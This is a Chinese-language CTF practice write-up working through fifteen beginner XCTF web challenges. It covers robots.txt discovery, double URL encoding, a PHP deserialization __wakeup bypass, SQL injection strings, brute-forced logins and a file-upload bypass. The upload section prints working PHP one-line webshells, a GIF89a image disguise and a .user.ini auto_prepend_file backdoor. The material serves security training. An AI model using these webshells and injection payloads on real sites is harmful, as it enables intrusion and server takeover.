1. Training-WWW-Robots

robots.txt 文件是一个文本文件，使用任何一个常见的文本编辑器，就可以创建和编辑它。robots.txt 是一个协议，而不是一个命令。 robots.txt 是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt 文件告诉爬虫程序在服务器上什么文件是可以被查看的。

当一个搜索爬虫访问一个站点时，它会首先检查该站点根目录下是否存在 robots.txt，如果存在，搜索机器人就会按照该文件中的内容来确定访问的范围；如果该文件不存在，所有的搜索爬虫将能够访问网站上所有没有被口令保护的页面。

打开文件robots.txt，查看文件内容，发现有默认不允许访问的文件fl0g.php。

再访问文件fl0g.php
http://111.198.29.45:56243/fl0g.php
于是得到flag

2. PHP2

对目标网站进行目录扫描（用dirsearch没扫出来，又用御剑扫描尝试了几次，感觉有时候有的目录没扫描出来，有时候又可以）

index.php页面与直接访问链接没有变化。

.phps文件就是 php 的源代码文件，通常用于提供给用户（访问者）查看 php 代码，因为用户无法直接通过 Web 浏览器看到 php 文件的来内容，所以需要用 phps 文件代替。

查看phps的源码可以看到，对获取的id参数进行url解码后的id内容如果为admin，则可获得flag，并且不允许直接获取的id为admin，但传入在url的参数本身在获取时就会经历一次url解码，因此要对admin进行两次编码。

将两次url编码后的内容作为id参数上传后

3. unserialize3

打开题目看到代码如下（忽略url链接上问号之后的内容）：

关键要素是函数 function __wakeup()，结合题目名称unserialize，可以想到php的反序列化，具体关于php的序列化的内容参考该博客->深度剖析PHP序列化和反序列化。

__wakeup()是用在反序列化操作中。unserialize()会检查存在一个__wakeup()方法。如果存在，则先会调用__wakeup()方法。

PHP反序列化漏洞：执行unserialize()时，先会调用__wakeup()。
当序列化字符串中属性值个数大于属性个数，就会导致反序列化异常，从而跳过__wakeup()。

实例化xctf类后的对象序列化后的内容为O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;}，也就是说xctf类只有1个类属性$flag，为了绕过wakeup函数，将序列化字符串中的属性值个数改为大于实际个数1的数，例如改成2，即可绕过。

修改url如上图，访问url：http://61.147.171.105:60349/?code=O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}，即可获得flag。

4. ics-06

拿到题目的时候发现只有报表中心页面可以用，忘了观察url，url上有参数id，通过暴力破解id的值拿到flag。

5. view_source

题目说让查看源码但不能用右键，印象里f12是可以的，但是电脑按f12一直弹出应用，后来发现要Fn+f12才行。于是查看到源码拿到flag。

根据WriteUp里的解答可以看到BurpSuite里也可以看到源码，将页面抓包，send repeater，在responds里查看到源码。

6. get_post

进入题目后首先看到题目说让用get方法传递一个名为a值为1的参数。
GET方法传递参数很简单，直接在url后面用?请求，不同参数用&隔开。

如上图，直接在url后面加上?a=1，即可进入下一个步骤，用POST方式提交一个名为b值为2的变量，也就是提交b=2。

GET方式直接在url上提交参数，POST方式需要在请求体body中提交，题目的页面本来就是GET请求方式，GET方式与POST方式的头部信息略有不同，POST中增加了Content-Type、Content-Length等信息，详见以下博客：
GET和POST的区别以及传参详细解说
HTTP请求报文格式 GET和POST
Get方法和Post方法的区别详解~

但是只知道将方式修改为POST，除此之外还是不知道如何添加Content-Type这些信息，一开始在BurpSuite中的repeater里没有添加这几条信息，尝试send之后response的响应内容出错。查看用户lonely_wei的WriteUp之后，发现可以直接在右边侧栏Inspector里修改请求类型与传递参数，以这种方式添加要传递的参数时左边报文内容上会自动添加Content-Type，再次send就成功得到了带有flag的响应。

除了在repeater里，在Proxy里也可以用这种方法直接修改截获的报文然后发送。

7. robots

进入网址什么都没有，直接查看robots.txt

可以看到有隐藏文件 f1ag_1s_h3re.php ，于是访问，获得flag

（第一道完全不看WriteUp拿到flag的题呜呜）

8. backup

常见的文件备份后缀有：
“.git” 、“.svn”、“ .swp”、“.~”、“.bak”、“.bash_history”、“.bkf”

可以直接用御剑扫描php目录，也可以一个后缀一个地尝试，最后发现.bak后缀是可以用的，会弹出一个文件让下载，然后打开文件看到flag。

9. cookie

进入网址后，页面显示“你知道什么是cookie吗”，于是用BurpSuite抓包，看到cookie内容如下：

cookie处显示查看cookie.php文件，于是访问该文件，看到页面显示“查看respons”，于是将访问cookie.php的页面抓包，send repeater，send，查看response，可以在头部看到flag，如下图：

10. disabled_button

按钮不能按，题目说是前端知识，于是查看源码，查看到有一行是按钮的属性，我们将disabled=""删掉，于是按钮可以按了，按下按钮得到flag。

disabled 属性规定应该禁用的 元素。被禁用的 input 元素是无法使用和无法点击的。

第二个方法是POST提交auth=flag，
具体分析见该博客：XCTF_Web_新手练习区：disabled_button

11. weak_auth

自己最开始就是随便输入了admin和123456，然后去抓包爆破。
一开始以为用户名和密码都要爆破，于是在网上找了很多字典。
发现量实在是太庞大，就随便看了一条爆破的响应报文，发现要求用用户名admin尝试，于是打算重新来，放过了最开始尝试的那条报文，没想到flag就出来了，也是有点运气的。
记住下次不要上来就爆破，先随便输一下用户名密码提交一下看看提示，然后再去爆破。

12. simple_php

php代码如图：

php中 == 是弱等于，两边的类型不同，则先是将类型转换成相同的，再进行比较。
参考博客：
PHP弱等于（==）绕过和is_number()函数的绕过

is_numeric函数会判断如果是数字和数字字符串则返回 TRUE，且php中弱类型比较时，会使(‘1234a’ == 1234)为真。
参考博客：
simple_php - is_numeric() 绕过与 ==的绕过

本文用a=''获得前半部分的flag。

13. baby_web

一进入网址显示这个页面是1.php，题目提示说初始页面，于是输入index.php，但还是会跳转到1.php，经验不多于是查看WriteUp，发现要访问index.php的时候抓包查看response，如下图：

可以看到response里有flag，并且是一个重定向的响应报文，重定向到了1.php。

14. inget

如题，让输入id并绕过，一道sql注入。
尝试直接 id=' ，页面不变，没有报错；
尝试 id=1 and 1=2 --+，页面不变，没有报错；
尝试 id=1 or 1=1 --+，页面不变；
尝试id=1' or 1=1 --+，出现flag。

15. easyupload

将一句话木马改成图片，尝试了黑名单绕过中的大小写绕过、重写绕过、特殊可解析后缀绕过、. htaccess绕过、使用Windows特性绕过、%00截断，都不行，于是查看WriteUp。

官方给出的需要绕过的点有：
（1）检查文件内容是否有php字符串
（2）检查后缀中是否有htaccess或ph
（3）检查文件头部信息
（4）文件MIME类型

针对（1），以前只知道一句话木马<?php @eval($_POST[1]);?>，这次知道了有一种短标签，<?=phpinfo();?>。
参考博客：php中的短标签
并通过qiuliangfz的WriteUp知道了eval的作用：
<?=eval($_POST['cmd']);?> //eval（str）函数把str字符串按照php代码来运行

针对（2），查看WriteUp后知道，在网站限制上传php文件时，可以利用.user.ini作为辅助来上传图片木马。参考文章如下：
.user.ini文件构成的PHP后门
它比.htaccess用的更广，不管是nginx/apache/IIS，只要是以fastcgi运行的php都可以用这个方法。
其中很多功能设置了只能php.ini配置，但是还是有一些危险的功能可以被我们控制，比如auto_prepend_file。
php.ini中有两项
auto_prepend_file 在页面顶部加载文件
auto_append_file 在页面底部加载文件
新建一个文件名叫.user.ini 文件内容为：

GIF89a
auto_prepend_file=a.jpg//让同目录下的所有php文件都包含a.jpg里的内容

针对（3），GIF89a 即是图片头文件欺骗，让后台以为这是图片。
针对（4），将.user.ini上传上去，同时用BurpSuite抓包，将Content-Type修改为Content-Type:image/jpg。
新建一个a.txt文件，写入如下内容：

GIF89a
<?=eval($_REQUEST['cmd']);?>//也可以是eval($_POST['cmd'])，也可以是上传命令执行代码system('cat /flag')而不是木马
//或者写入：
GIF89a
<?=system('cat /flag');?>

或写入最开始的一句话木马：

GIF89a
<?=eval($_POST[1]);?>

再将后缀名修改为jpg，然后上传，这个文件可以绕过前面的4项检查，但是上传的是jpg文件不会直接被当作php来执行，因此需要前面的.user.ini文件来将这个文件添加到其他的php文件中来执行。

具体操作过程如下：
编写.user.ini文件：

上传文件并BurpSuie修改请求头中的ContentType：

编写a.txt并修改后缀为jpg：

上传a.jpg并查看上传文件所在路径：

蚁剑成功连接并看到flag文件：